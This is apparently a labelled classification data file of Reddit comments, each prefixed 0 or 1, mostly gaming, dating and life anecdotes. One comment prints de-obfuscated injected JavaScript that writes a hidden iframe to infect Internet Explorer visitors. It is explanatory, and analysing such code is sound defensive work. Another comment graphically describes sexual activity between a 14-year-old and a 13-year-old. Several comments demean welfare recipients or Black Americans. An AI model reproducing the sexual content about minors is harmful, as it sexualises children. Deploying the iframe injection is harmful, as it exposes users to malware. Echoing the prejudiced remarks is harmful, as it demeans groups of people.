0	Keywords are good but don't overload it (and good lord make sure it's things you actually know because if it's on there I WILL ask) a page of solid text is hard to look at and regardless of what good nuggets might be in there, I'm putting it aside because it's a bother to read. But also because you need to be concise. Yeah we're engineers, but we write reports on what we've done and you need to be able to get the point across without putting the reader to sleep.   The way it seems to work out, I'm handed a stack of 10-15 resumes and I have a few hours to decide who I want to speak to in order to let HR know. I also have a full time engineering job to get done.  I'm skimming them for key words at best.  I wish i could give you the time you deserve but i just don't have it.  A coworker showed me his resume once: Three solid pages of keywords, he reasoned a computer sorts it anyway, put everything.  Sitting on this side I'll tell you: nope. Ain't nobody got time for that.   But when I do meet you, know that I know you're fresh out of school. You won't know everything and most of what you know isn't all that relevant.  We're hiring grad level kids, we know what we're getting.  Not everyone is going to be like me, but a big part of your impression is not what you say but how you say it.  How passionate were you about what you built? How excited were you the first time your code gave you the right answer? We can mold you into what we need.  You can always learn specifics later but you need to be the kind of person who actually will.  An engineer is never done learning and we've got enough lazy ones.   All that said, getting the interview is the hard part.  Every single job I've had, I knew somebody first.  If you did internships, call your old bosses.  Do you have friends who graduated last year? They're you're best bet, they'll be happy to help, they get a referral bonus.  Once you have your first job, build contacts, it sounds obvious but be friendly to everyone; be likeable and make a good impression because you never know who will end up in a position of power there or at the next job.  Burn no bridges.
0	If a cat is on my property with nothing to identify it as belonging to someone, it's anyone's. I don't care if you adopted it and paid for it and raised it, keep it on your own damn property or get it chipped so I can let you know where it is and tell you to keep it where it came from.   Is the idea of keeping your pet on your property so ridiculous for some cats just because they're "outdoor" cats? If it likes to leave your property occasionally for unknown amounts of time and possibly is thought of as belonging to another family, it's not a pet, it's just a wandering animal that you were stupid enough to spend money on and feed.
0	Huh, I bet the Hispanic gangs which are these days making up [34.9%]( of prisoners will be surprised about this statistic.  The percentage of prisoners who are Black is 37.1%.   Oh, and Hispanics are 16.3% of the population while Blacks are 12.6%.
0	I worked at a grocery store up the street from what we all call "The Bottoms". The number if people inn food streams and wic was insane. But there seem to be endless loopholes with both.   WIC checks give you specific instructions. For example, on most it will not allow you to get whole milk, sugary cereals etc. One time these three obese white women had a huge fit because we wouldnt go against the checks instructions and sell them whole milk or this fancy cheese. They bitch about how Bi-Lo would do it and leave to go there. Like, really bitch? Its fucking free just accept it!   Another time another group of beyond fat women (this demographic was our most common customer) paid with foodstamps for $200 worth of junk and garbage. I go outside to get shopping carts and these same bitches open the trunk to a brand new toyota already filled with tons of walmart bags. I dont know how many foodstamps they need, but it certainly isnt that many. They were ungrateful and ghetto. Naturally they made a left turn and into "that" part of town.   Another time, this young but dirty looking girl came through my line. She grabbed a 40 and asked for ciggarettes. She also wanted a can of enfamil (baby formula). There wasnt enough on her food stamp card. So, with the 20 in her wallet, she paid for the beer and ciggs, but not the food for her kid. Blew our fucking minds.
0	I think it has more to do with the hypothetical reactions to the situation, and perhaps lack of empathy to other drivers?   Some people must drive slower than the rest of the flow of traffic, which can be due to many factors such as age, poor eyesight, or mechanical issues with their car.  This is understandable and forgivable, as such traffic is generally directed to the outer (slower) lanes so that the flow of traffic is not impeded.  A car coming up faster behind them will, at most, have to slow down momentarily if the passing lane is blocked while they wait for it to clear and go around.   However, when the slow car in the outer lane speeds up to match the car attempting to pass, a blockage is created: either the car attempting to pass must slow down and pull back behind the ex-slow car, which means any other traffic behind the passing car must also make adjustments; or else the passing and slow car form a two-lane block which sort of screws the pooch for everyone behind them.   The point is that civil/kind/courteous drivers attempt to cause as little issue for the other drivers on the road as possible while getting to their destination.
0	in the movie, the dark knight rises, john blake (jgl) real name is Robin, and it is mentioned in the movie.
0	I feel like I should mention eventually, I dated a girl for 3 years who had done at least 95% of the things people have posted. Telling me i couldnt have friends because they would brainwash me, threatening to hurt/kill herself if i disobeyed or left her, showing up randomly to check in on me, forbidding me to do anything alone if i had the option of bringing her, calling me so many times when my phone was dead verizon blocked her from calling until i responded, the list goes on. I gave in this time because this is how it started. The day after i met her she complained i wasnt giving her enough attention, so i did what any man would do... i stuck my dick in crazy. The next morning I had neglected to do something small for her (i dont even remember what it was) and was told i was a horrible boyfriend. I said  "since when am i your boyfriend?" And she responded with "I dont sleep with guys im not dating, im not a slut". She spent the next 3 days there, and within a month i was told that if i wanted to keep seeing her i needed to move in with her. Looking back on it, sometimes i wonder which one of us was crazier.  Its been over two years now and despite many opportunities ive been unable to bring myself to have any sort of official/exclusive relationship with anyone. Overly attached can easily lead to emotionally abusive if you let it. Fuck her, fuck everyone like her, and fuck me for still to this day feeling like im the one that fucked up even though im the one that left her. If any redditers out there are foolish or desperate enough to give in to a girl like this just because you think you'll leave when it gets bad, just remember that she'll get into your head. She'll tell you your amazing while convincing you that you arent good enough for anyone else. She'll make you feel great about your intellect and potential while she makes you feel like shit for not using it. Shell offer you a home, then call you homeless for taking it. Before you even realize what shes done, youve stopped Thinking shes overly attached and have come to depend on her, because shes convinced you shes the only good and reliable thing in your life. And the abuse is worth it, because at least someone loves you and you could be alone. She will make you stay, even if it means caging you, breaking your spirit, and destroying who you are, and if you ever get away it will be with nothing but the clothes on your back for fear she might convince you to stay while you pack. When its done, even after youve left, every critisism will cut you, and every missed call will leave you feeling inexplicably terrified. Im sure no ones going to notice this, burried in reddit but after reading all these i needed to vent. I could write a book about all the shit i dealt with.
0	That's the whole concept behind taxes. You aren't always going to "get back" what you put in in a concrete way that you can see. But when your tax dollars go to things like educating others, maintaining infrastructure, healthcare, it benefits everyone, including you.   Other people becoming educated improves the entire economy and boosts GDP by allowing people to get better-paying jobs, thus spending more. Education also gives people the skills needed to create better things like your favorite video game or a super economical car and so on, which you can benefit from not only by having access to a product that changes your life quality but creates money through sales and exports that benefit the whole country.   Having universal free healthcare means that person who comes up with that idea or product is able to do so, instead of suffering from terrible migraines and not being able to see the doctor. It means that if you are a boss, your employees are happier, more productive, and less likely to need time off because their illnesses are taken care of before they get to a critical point. It means you don't have to watch your cousin/sister/mom/son suffer for years (maybe even die) with a debilitating but treatable health condition that they can't get fixed because they can't afford to go to the doctor and get treatment.   Finally, even if the poor benefited more than the middle class in this economic circumstance, the middle class still benefits more in this system than the US system. Just because a homeless person benefits more from universal healthcare than a person with decent health in the middle class doesn't mean both aren't better off or that it isn't worth it to have a system like that. Plus you never know when a catastrophe might happen to you and you need that help provided by such a system.
0	Then there's that mermaids thing. It's existence is painful.   EDIT: Just to clarify why it's baloney.  We know with absolute certainty that "primates" (the group containing humans, chimps, gorillas, and anything else with humanoid arms, hands, and opposable thumbs) did not evolve directly from fish. The first species remotely monkey-like to evolve had left the aquatic world centuries, possibly millennia before.  (Guesswork here- really have no idea on the millennia part.)   It's worth noting that having hands and a humanoid torso would be horribly impractical for fast movement, and completely unnecessary for any aquatic diet.  However, the factor that truly dispels this possibility, is the idea of a mammal and a  fish  evolving to have such similar traits, having diverged on the evolutionary tree so long ago.
0	I can confirm this. I'm friends with this girl who I never saw in a sexual light until one day when she wore this skinny purple dress. As soon as I saw her, my brain was like "DAMN! WHERE THE FUCK DID SHE COME FROM?" After that, I put her out of my mind because I never thought she'd go for me, until both of our friends mentioned we'd make a good couple. We joked about it, but I still didn't make a move. Months later I found out that she had liked me, but it was too late now. She is currently tormenting me through my insomnia.
0	Active duty here. I agree.   However, I do want to point out that once you enter the service, and  you see the things most of us have seen, it changes you. It's difficult to look at civilians in the same light after the those experiences, knowing that they will never know the horrors you've witnessed. You take solace in the brotherhood of your brothers in arms, knowing they share the same "changing" life experiences. Knowing they could get through some of the more elite physical, mental, and emotional tests this country  has to offer places you in a group of individuals that are "in" understand.   I probably didn't explain myself very well, but:
0	I have a severe brain injury (my dominant frontal lobe doesn't lobe any more, I have very little awareness or sense of time and crazy heavy chronic fatigue syndrome), but I feel like everybody has their threshold of happiness an suffering.   One person's worst day might be a lot better than another's average day, but something reasonably bad occurring in the first person's day might be the worst thing they can remember happening, and it might really upset them, where something much much worse might happen to person number two, and it's one of the worst things that's happened for a long time for them, and so it really upsets them. Both people are really upset, maybe as upset as they've ever been, and both people can benefit from support and love to move on from whatever it is that has happened.   I'll never tell somebody that I've got it worse (I'm better than Toby Maguire at acting okay when I'm not, so while most people know I almost died, aside from a few scars they don't notice much of a difference, and I try not to burden them with it), I'll sit with them and talk about it, and get them to analyse it internally and externally until they get a good grip on how bad the situation actually is, and how long it will actually effect them in their future.
0	Really?  We're going with the "you're young, you don't understand..." counterpoint?   First of all, using sarcasm as a means to critique an incredibly weak argument is perfectly legitimate.  It's been used in proper debate to highlight the absurdity of an opposing viewpoint for almost as long as proper debate has existed, and by people much smarter than you or I.  Further, it's a much better method of response than a shallow appeal to age or maturity.   Second, this is the internet.  If using sarcasm is indicative of youth, then I suspect almost no one on this site is old enough to drive.   Third, I have made (what I hope are) much more sophisticated points elsewhere in this thread.  I will respond to thoughtful opposition with thoughtful words.  I will respond to harsh stupidity with snark.  Proportionate response is my strategy, and I am hardly alone in that.   Finally, again, it's a forum on the internet.  I'm not trying to create a utopia.  My responses don't have to sound like a Platonic dialogue.
1	Webdev here.   Basically the site loads up a javascript file (based on a popular javascript from Twitter), which unfortunately has been injected with  malicious code . The malicious code is  embedded directly in their website . That's bad.   Parsing the obfuscated code, I get the following:   if (navigator.userAgent.indexOf("MSIE") &gt; 0 ){     document.write('&lt;style&gt;.jz97521lox { position:absolute; left:-1104px; top:-1792px} &lt;/style&gt; &lt;div class="jz97521lox"&gt;&lt;iframe src=" width="172" height="132"&gt;&lt;/iframe&gt;&lt;/div&gt;'); }    The above code injects an iframe (subpage) into the current page, which loads up the URL you see above and then infects your computer with whatever.   Note that I've changed the URL above a bit, so no newbies check it out from curiousity. The original does have malicious code and AntiVirus software will detect/block it. The code above is also mainly targeted towards Internet Explorer users as the security with IE isn't as high as the other browsers in some rare cares.
0	I took it today, I didn't bring a calculator for the Math portion because, hey, last time they gave me a nice graphing calculator. When I raised my hand to ask for one I thought I was the victim of a cruel joke. I was handed a pitiful TI-30, a calculator that can neither graph nor do basic order of operations. I find it pathetic that they can SCREW you if you can't afford your own calculator. The worst part is, I had a nice graphing calculator, AT HOME. FUCK MY SHIT, I was hoping to get at least a 27 on Math to show myself prepared for AP Calculus. I'll be lucky if I got a 25 with that piece of shit. I realize the entitled tone of my passage, but it is seriously extremely difficult and time-consuming to do most any type of equation or graphing from scratch.
0	I may have just been lucky, but when I was a TA I knew of a number of professors who would help out a student in some way who would come to them with their problem in a respectful way on their own. An example of this was an upper level archaeological theory course. The material was dense, and the exam even denser. Sit and write for an hour. I had another exam immediately following across campus. While she let people stay late to finish I was unable too. I only answered 3 of the 5 questions. Poorly too, I thought.   I went to her office and explained to her the situation the next day. I ended up with a 90% of the exam. It was a small class. Maybe 12 people. I received the highest grade on that exam. I was a bit embarrassed.   Similarly, I remember grading papers with another TA and the professor of one of those massive 100 level intro to cultural anthropology courses.  If the student had good attendance or had come and seen her in her office hours your 89.5 would become and A, but if not your 59.5 would stay an F.
1	How i dealt with it?   Gaming is my hobby and i like it. Why i don't socialize as much as others? My classmates/colleagues enjoy getting shitfaced every friday-sunday, whereas I really dont fancy drinking. What do you think is better for me and my future; game where i train my on-point decision making or "party animals" who get drunk, fuck each other and get pregnant/sick/whatever happens from unprotected sex.   After you did some sort of that intro (make it fit your parents, you know them and you know what will actually make them think) add something along the line:   I am a successful student one thing you should do is to be proud of me and let me develop as a human being by myself. Keeping me in "cage" will never help me develop and understand what is better for me.   Why I tell that to you?   I had similar problem but when i was 16. I was playing WOW a lot and for my parents it looked like I am not studying. So they were threatening me that if i won't study I won't get to University and blah blah blah. Even though I told them that I am best student in my class they didn't really believe me until my graduation (i was 18.5 by that time) where they finally saw my diploma. Same day I got accepted to University abroad.  After I just told them to trust me because I know what I am doing. Since then I never had problems with "gaming".
0	It's hard to imagine for me now, but there was a time when it was one of the smartest and edgiest shows on TV. There are a few good seasons (1, 2, and 4). I always thought Deb was a great character and the show had some really good moments later, but the writers were completely unwilling to commit to anything that would really force Dexter to deal with the consequences of his behavior so every time the show took a risk, somehow everything would return to the status quo pretty quickly. It turned out that you're right and there was no real point. What a letdown. The series finale was one of the worst I've ever seen.
0	Yep. I'm officially a week out. We were planning on moving in together. She said she couldn't handle things right now and that she needed a break. Since we broke up, I've had 0 motivation, and I think/dream about her constantly. In every single dream she comes back and I explain what I want to explain to her so bad. that I know I have some growing up to do but that I don't want to lose her because of that. She understands and that's when I wake up. And then it's just a feeling of dread sadness and guilt. I'm trying to be respectful and give her space in the hope that she'll talk to me again. But unfortunately I have a friend who "blogs". I happened to read an entry about her. And I just feel like I'm broken. I wrote her an email after a few days. She still hasn't replied. I check my phone everyday. Every time it dings my heart does a front flip. Then every time it's spam mail about "going away on vacation". Bleh
0	My mom lost her job in 08. I end up sticking around keeping things afloat so she has a chance to get on my feet again. In the meantime I feel my life was being put on hold and a started growing resentment towards her.   2013 comes around and I've had enough. I realized I had just been enabling her to depend on me for money, social interactions, everything. I was finally able to see her as the human being she was and not as my mommy who could do no wrong.   I moved out. Got a place with my girlfriend. Have been incredibly happy.   What I've learned about myself and family is that I didn't pick these fucking people and I have no obligation to keep them in my life. I'm a son and a brother, not the father role replacement you forced on me. So family, get your own shit together, you're all grown-ups now, and fuck off with your bullshit. I aint interested in it and I don't fucking care!   Forgive the rant... But I thought the same thing going through this process. My dad had an affair, got caught, and pretty much said fuck it I'm out. His dead now and my mother never forgave him or got over it. I think she has narcissistic personality disorder which actually explains  sooooo  much about her behavior.
1	free long range poke   That is a lie. Zilean uses mana and his bombs cost 70 mana at level 1. His base mana pool is 260 (with a 60 point increase when he levels). He gets about 5 bombs at level 1 before going oom (not taking into account manaregen). It isn't free and you can use this to your advantage. His whole deal is to poke super hard with bombs and zone you early and let his passive snowball his lane. If you really want to counter his passive, get you and your partner to lane before them and shove early so you get your xp first. If you are a few creeps ahead of your lane partner you will hit 2 at about the same time as the enemy with zilean passive.   Take someone like sona or lulu. With sona you can start with w and heal your partner and you will win the first level 2 trade with your powerchord w onto the enemy carry. With sona's cost on her heal spell you will outlast enemy zilean if he spams bombs and you heal appropriately. With lulu put the shield on whoever gets targeted for the bomb. Build manaregen to keep up with him and his damage will fall off while your utility will still be useful.
1	I would too
1	It's interesting because both Piglet and Bjergsen got a circlejerk fan base.  It was a nice play but the reaction would be different if either off them made this play on them vs a random challenger player.   When Bjergsen and Piglet makes plays it's because they're Gods and they outplayed the enemy.   When they get outplayed however people tend to discredit the person that outplayed them and come up with reasons for why the play wasn't that good.  "Bad match up", poor itemization, lvl difference etc.  The list goes on.   Now whenever Bjergsen, Piglet and other circlejerk pro players do something against a random you will rarely see people try to discredit them.  You never hear people say "That guy misplayed it so hard, that's why Bjergsen was able to get the kill etc".
1	IIRC bonus RP usually only counts if you buy it using some sort of credit/bank card and buy it directly from the Riot store.   Might as well use it now since you don't get a bonus from using the 50$ RP card.   Look at the bottom of the "Purchase RP" tab:   Copypasta incoming...   "One of the core values of Riot Games is being open about what's going here and why we make certain decisions.  If you live in Europe you may notice that the amount of Riot Points we give you for the same price may vary by payment method.  Using a credit card, 5 Euros may get you more Riot Points than using an SMS.   We put a lot of thought into the decision to have different pricing by payment type.  After all, either way you are giving up 5 Euros (or Dollars, Pounds, etc), why wouldn't you get the same Riot Points either way?  We have deals with different companies to provide different payments.  They actually all take a cut of the Euros you pay, but the amount they take is different (it's actually different by country too).  We could have given out Riot Points equally across payment methods by using an average of the different payout percentages, but we didn't want to penalize and raise prices on our "cheapest" forms of payment, credit cards and PayPal.  It also made sense for us to encourage players to use those "cheaper" forms of payment, since we get a larger share of the money you spend.   So what we do is, when a payment type is less expensive for us, we pass that benefit on to you in the form of more Riot Points.  You get more Riot Points per Euro when we get a higher share of the amount of Euros you pay.   Because the payouts vary by country (because the deals we have vary by country, especially with SMS payments where different countries have different wireless companies), and they vary by time (with currency fluctuations, and when a better deal is negotiated), it's not a simple task to list all your options.  The best way to find the current prices is to go to the store in League of Legends."
1	The fact that you are getting 2-3 kills and then dying is entirely on you. This game isn't a team deathmatch, and to be honest I would much prefer my team to kill a tank and take a dragon/baron/tower than for me to go in and get 2 kills in their back line and have the enemy tanks clean up my team.
1	I feel in league, each pro-player has a mechanical ceiling so to speak. That ceiling will be as good as they can get mechanically. It's safe to assume as they grow older, there will be younger players who are mechanically better than they are, making these older pros hinder the performance of the team when put to face against these younger players. Sure, these older pros have the experience on the competitive LoL and LAN, but these can be easily learned and experienced through exposure.   Compared to football, where there are players who will stay loyal to the club for a long time. Ryan Giggs, Javier Zanetti, Paul Scholes, Carles Puyol to name a few. As they get older, they're no longer as fast and agile as the younger players, they get replaced as well. They're no longer on the starting 11. However there comes a time in games where the experience they have is invaluable to winning the game, which is one of the reason why the clubs choose to hold on to them and give them contracts instead of releasing them as free agents.
1	The only time I find it appropriate to gloat is when someone else starts it. For example, earlier I had a game where an Ahri got a double kill from a bad tower dive and said "you noobs are pathetic, GG easy game" from that point on we proceeded to steamroll their team because they weren't actually good. And everyone spent the rest of the game mocking the Ahri because she played pretty poorly.
1	Hey man, thanks for the positive encouragement. Sometimes I get sick of all the NA vs. EU bullshit. I for one will be rooting for any western team that gets matched against a Korean team. It's exciting to root for the underdog. Here's a x-post I made from a thread on TSM's chances against White:   I think TSM's most important pick is going to be Lee Sin. This is going to be a highly contested pick with DanDy and is also Amazing's comfort champion of choice. TSM will need a strong early pressure jungler like Lee Sin to stay in the game early (They don't perform well after falling behind, especially against a Korean team). As far as the teamfight strategy goes, I expect TSM to stick to their guns and continue playing the similar comps that they've been playing. This revolves around a hyper carry ADC (Trist or Kog), with a lot of peel/zoning from the rest of the team (Expect Alistar, Moakai, Rumble, Lulu from Dyrus and Janna/Nami from Lustboy). I'd also expect Bjerg to go for a "safer" teamfight mid laner as opposed to an assassin, seeing as there is a lower chance of outplay versus the mechanically gifted Korean players (Expect Ori, Syndra, Xerath from Bjergsen).   Keys to the game for TSM:     Get Lee Sin   Decisiveness in teamfights     Try to set up 2v1s with Turtle on a hyper carry     VISION CONTROL FROM EVERYONE (Mata is a god here)     0 Mistakes       All in all, it looks pretty grim. TSM is going to have to play out of their minds with flawless execution to win this series. It's unlikely, but as a TSM fan you gotta believe.
1	I think in theory that Mundo/WW regen being countered by Executioner's Calling is a great idea, but in theory, I don't think it works very well. I find those items aren't that great unless the enemy team is incredibly reliant on that mechanic. And then we get into item creep. What counts for mechanics like that? Displacement? Walls? Stun? Silence? Healing? Teleporting?   Because those six item slots are so powerful, you can't make an item that counters a specific game mechanic without sacrificing a major part of your power. What Graves will take Executioner's Calling over a Madred's Bloodrazer or an Infinity Edge in endgame? Or what Varus will spend the 1350g instead of almost buying a BF Sword? (I'm not saying it NEVER happens, it's just not that common, because it's a subpar choice in the long run).   Thus, Executioner's Calling should either be on par with one of those items, build into a better item (i.e. Chalice of Harmony -> Athene's, a recent item addition that I really like), or be cheap enough that it doesn't set you too far back when you decide to sell it later.   The more of those items Riot adds, the more complicated itemization becomes, drawing players toward generic cookie cutter builds and away from unique items that vary with the situation. Executioner's Calling, in my experience, needs a buff; I almost never see it used, despite Mundo's popularity. Also consider Ionic Spark, Haunting Guise, Cloak & Dagger, Tiamat . . . are these items doing anyone any good? Does their rarely-used existence improve itemization? No.
1	This.   I'm not challenger, but I always play lane bullies. Varus is pretty gross if you can get an edge, since there's nowhere to hide from his poke.   The other thing is, don't build the same items on every adc every game. Varus works with bt-&gt;lw for poke, or botrk/any as item, or ie-&gt;pd/statik shiv, or ie-&gt;youmuus. Personally I like bf into brutalizer when I'm ahead, for stupid poke. It's basically free towers of you hit two q's. Then the ghost blade active helps you self peel.
0	It also depends on the car...  Braking performance varies substantially among production cars.   If you are in Chevy Aveo (60-0mph in 139ft) following two car lengths behind a Corvette Z06  (60-0mph in 93ft), then even with instantaneous reaction time you are still over a car length too close to prevent an accident.  This discrepancy only gets larger with speed.
0	The summer after 8th grade, my girlfriend and I used to go to the movies and see Leprechaun 2, which was a TERRIBLE movie, but there was never a single other person in the theater.  We used to sit in the back row and make out with all the elegance and skill of two salivating bloodhounds.   Anyway, one day she got down on her knees in front of me and rested her chin on my crotch.  I had no idea what was happening, and I basically tightened my legs up a little so she couldn't easily move her head any closer to my cock, which was at this point as hard as a 14 year old cock can be.  I would stroke her hair and she never went any farther.   She tried this each time we came back to see the movie.  Finally toward the end of summer, we were sitting in the front row of the theater to change things up.  Since she had more room without chairs in front of us, she got down on her knees, pushed my legs apart, and unbuttoned my jeans (supa-fly button-fly jeans baby!)  As she reached in to pull out my cock out, I blew literally the biggest load of my life all over the bottom of her chin and all in her gorgeous, long blonde 13 year old hair which had draped around my legs.  Her hair was a completely ruined mess of hot steamy cum.  Amazingly, we sat through the rest of the movie, didn't really talk, and when we left she went to the bathroom to clean up.   I didn't talk to her that much after that, but I completely regret my stupidity for not realizing I could have gotten an entire summer's worth of 2 second blowjobs from my hot blonde 13 yr old girlfriend until it was too late.
0	i agree.  unfortunately, you can't really be besties with the opposite sex if you're straight and in a relationship with someone else.   i mean, there are exceptions, like if you just  know  the guy was so dorky and ugly and smelly that it really was only platonic, then there is a 5% chance that i'd let it fly.   but if i caught even a whiff of a vibe that my wife was attracted to a male friend i would make it perfectly clear that either he goes or we are at a crossroads.  the reality is, people are  constantly  attracted to other people.  it's part of our open human nature.   that's not bad, really. what  is  bad is when we are regularly exposed to people we are attracted to and  start to emotionally engage them .    you don't have to be physical to have an affair. emotional infidelity is very real and in some ways even more painful than a one night stand after getting shitfaced at a bar somewhere.   you do not want another straight male weighing in on your relationship when you're not around. even if it was impossible for your wife to be attracted to some ugly little fuck, he still represents bringing a 'competitor' into the marriage.  it opens you up to a world of problems.   this goes for straight, gay, male or female, by the way. i'm just speaking from a straight male perspective.
1	I totally agree with this.   I used to be a mega noob (not that I am that good now) and had major problems with flaming and stying focused etc.   Now I always take a break inbetween games and do a bit of workout with some weights. This is drastically improved my performances. Now I am always focused on winning and I never give up.
0	Oh please. Of course it's all in your head. Confidence and comfort in one's own skin are some of the most attractive traits males find in females. Those wayyy outweighs looks for the average male. But moping around reddit telling everyone how ugly you are achieves nothing.   The reason something like this comes across as annoying is because there are probably thousands of males who would find themselves perfectly compatible with you, but the complaining that other girls look better would get tiresome. Mostly because none of us actually sit down and compare, we just like the girl we're compatible with.
0	When I first joined facebook, back in 2006, I got an invite to a beautiful girl's party. I'd seen her around campus, I was blown down that she'd sent me an invite. I replied back with something incriminating due to my misunderstanding of facebook, and only after that did I realize how it probably worked. I didn't get a reply, went to the party with some other people who had been invited intending to play it cool, and she was being a cunt so we left.
1	Diamond player here. Still have only 2 rune pages. Worst part is I made an account back when you started with 3 pages, but when I started to seriously play, I'd forgotten that I'd made the account.   It's pretty obvious that Rune Pages are a rip off compared to everything else, but probably for good business reason. You need only to look at the pre-game lobby to see something way more unfair than 6300 per rune page. Why can you edit masteries but not runes? Same reason a single page is as much as a new hero, because a huge % of rp purchases are rune pages.
0	This I think is the ultimate issue at least between white americans and african americans.  For some reason african americans appear to think that they are owed something because of slavery or the civil rights movement.  You know what?  Those events were horrible and they are bad times in America's history.  Something else to consider though is that I am white and my family didn't come to America until after the turn of the 20th century which is after the abolition of slavery.  Then my parents weren't born until in the midst of the civil rights movement in the 60s.  So then my parent did not have any influence on the repression of civil rights for african americans.  So to recap my family has had zero influence on the oppression of african americans in the past so why should I be held responsible for people who are not related to me simply because of the color of my skin.
0	You're entitled to your opinion, but isn't that a bit of a generalization ? There's all kind of animes, some serious ones, some funny ones, some stupid ones and so on. I used to think like you, hated Dragon Ball Z and Sailor Moon and Saint Seiya that were always on TV (O and that soccer one too, but I hate soccer so...). I hated the aesthetics (well, Saint Seiya looked ok I guess), they were really slow and boring, and when something finally happened, they were needlessly violent before becoming super slow again.   Then I caught  Full Metal Alchemist , so it was funny for teenager me. Over time, I grew hooked. The story is awesome and well paced, the characters are very deeply developed as well as their interconnections, and the animation is really well done and pretty IMO. Also the soundtrack is amazing. And it's limited in length, there's 51 episodes and it's done (yes there's been a sequel series, but I haven't watched it yet, and the 51 episodes are a complete story by themselves). I rewatch the whole thing roughly every 2-3 years since then, and it's awesome every single time. I've watched a few other animes since, and it's hit or miss, I'll like some, I won't like others.
0	The more selfish you are, the more awful it is to grow old. I can't stress this enough.   As you get older responsibilities come. Can't avoid it. And more come each year. Job. Marriage. Kids. Kids are the craziest part because being responsible for the moral, intellectual, spiritual, emotional and psychological formation of another human being will mess with you. I remember thinking, "What idiot let us bring a baby home with us?" Eventually, you'll begin thinking you can't handle one more responsibility without losing it. But you know what, you can handle it. You have what it takes.   And if you are able to surrender that selfish core (or the "me monster" as Brian Regan calls it), then it can all be a blast. Over time you realize that your sense of entitlement is directly related to your enjoyment of your life. The less entitled the better. Are there more beautiful women to be married to? Yep. Sure are. If you are willing to sacrifice the particularity that is your wife's beauty. No one is like her. No one. Would it be easier to get a divorce than to constantly compromise, adapt, forgive, confess and limit your own personal desires / goals? Yes. Could be. If you are willing to sacrifice the rare gift of being able to look the woman whom you have hurt more than anyone else in the world in the eyes and feel no shame when she says, "I forgive you. I still love you. I'm never going anywhere." Money can't buy love like that. Would it be more fun to not have kids, to have all the time I used to have to game, read <insert pastime here>? Sure. But one day my wife and I realized, as human beings we weren't created to come home every day and say, "Hey what do you want to do tonight?" Year in and year out. That kind of self-centeredness is seriously screwed up.   I have roughly 1 hour a day of free time right now during the week (37, married, 3 year old son , 7 week old son, and an awesome job). 1 hour per day. It ain't easy. But, as someone who came from a physically and emotionally abusive home, when you step back and realize that what I am creating for my boys is the environment I never had - a father who is engaged, who plays with them, who tells them he loves them 100 times a day, who hugs them way too much, who reads their comics, watches their shows, plays their games, who disciplines them without anger, who is excited about pressing into their development as men instead of ignoring it, who will help them care for and protect all the women they find in their lives - then the sacrifices don't feel like sacrifices anymore, do they? No. They feel like opportunities. No. They feel like even more than that. A calling to live for something more than just myself. That is the glory of getting old. It is a gift, not a curse. Indeed, a blessing.   And I still get to jam on my 3DS when everyone's asleep.
0	ITT: A bunch of people who like to psychoanalyze OP and call him an asshole and a bully.   Honestly, dude? I don't blame you. I've had similar experiences with bullies finding me on facebook and asking for a friend request. Just because we had to put up with them in High School doesn't mean you have to put up with them now, and doesn't mean they're good people either. It's your life, your facebook.   Hell, they might be the nicest person in the world right now, maybe they completely changed their ways. Or, maybe they haven't completely changed and instead they added you so they could check up on where you ended up in life, looking through your profile so they could try to find flaws in your current life that they could (to themselves) mock and feel better about themselves. Either way, you'll probably never know, because you'll most likely never encounter that person face-to-face again. Even if you did, at best would be a short cordial conversation that ends with an awkward goodbye and offer to hang out sometime that will never be fullfilled.
1	I find that I can get flare stacked by 17 mins, most of the time if I ignore lanes completely 14-15mins and lanes have gone +-2kills over all lanes I finish flare, gank mid counter gank bot and boom we gain ~3 kills, soloq is very linear, most jungles do the same thing all the time.
1	It still is not justified. You always face obstacles in life. Be it nature itself presenting you with a problem or other humans who are the problem themselves. Just because you face a couple of trolls or feeders, you can't end up drophacking an entire game. Not only is this unfair to you, its unfair to the winners. Imagine if this happen'ed to you when you were  winning , how is it justifiable then??   Lets say you were playing football (Soccer). At 89 minutes you're 7 - 0 and you've absolutely crushed the opposing team. Suddenly the referee declares that the match was played on unfair terms, say something that was completely  out of your control , the next time you meet they absolutely crush you ( Its their day ). Your morale is torn apart and shredded to pieces.   However my opinion is, the same scenario does not apply for the SK - GMB remake. Granted that it was something out of GMB's control but the fact that SK noticed it and acknowledged the fact that something is wrong  but  Riot did not give them the opportunity to remake the game show's that it was unfair for both the team's and was a really really bad call by Riot.
1	If you can play one champ at a 2k elo you can learn more from playing 5 champs at a 1.5k elo. You learn much more about the mechanics of the game and how buff control works. Also not everyone that wants high elo wants to compete competitively,  they just prefer a more advanced level of difficulty.
1	Well hang in there man. I'm sure you put a lot of effort into getting where you are today. People forget that even high elo players need to relax every now and then. Also if you don't lose every now and then, that would limit your ability to keep getting better :)
0	I'm not trying to outdo you but I have a much much embarrassing story.  I had to get braces as an adult (that's a different story altogether). Anyway, after about a week of having them on I was still in immense pain and since I have a lot of time to think at work (software developer at the time) I decided I could think about my code and listen to YouTube videos of people with similar pain.  I fired up the ole YouTube app and listened to teeenage girls complain about their braces and how they coped with the pain. The volume seemed to be low so I turned it all the way up and it still sounded muffled but I blamed it on the crappy headphone brand. After watching some videos about other people's braces pain I decided that it wasn't the worst thing in the world so I accepted the pain, took some of their remedies, and decided to browse around YouTube for a while. I continued to click on suggested YouTube links and ended up clicking through some of the popular videos at the time. I listened to that "hide yo kid" rap song, tourettes guy videos, that old comedian who died a while back who had the skit about 7 dirty words (note, these are probably bad examples about what was popular at the time but you get the point).  Well, I'm watching these videos for about an hour. A fucking hour! Now let me tell you that I worked in an open seating environment and there were at least 50 people within earshot of my phone. My friend was leaving for the day and taps me on my shoulder. I take my headphones off and said "what's up" and he pointed at the other end of my headphones. My headphones were unplugged and for an hour in a corporate office I was listening to the most ridiculous stuff on the internet and not 1 person told me that I was making an ass of myself. I immediately began to sweat but tried to act "calm, cool, and collected"
1	Il say it. Atleast i'm proud of acomplished diamond 1.in solo queue. And seeing other getting this banner from a 3on3. Game. Just annoys me. Solo queue is harder because you getting to queue up with 4 randoms and have to find diffrent playstyle and it takes much longer to get plat/diamond tier in solo queue than it  would in 3v3. The banner would also lose its worth atleast in my oppinion because now it seems that you dont have to fight that hard for it.   Sorry for my english.
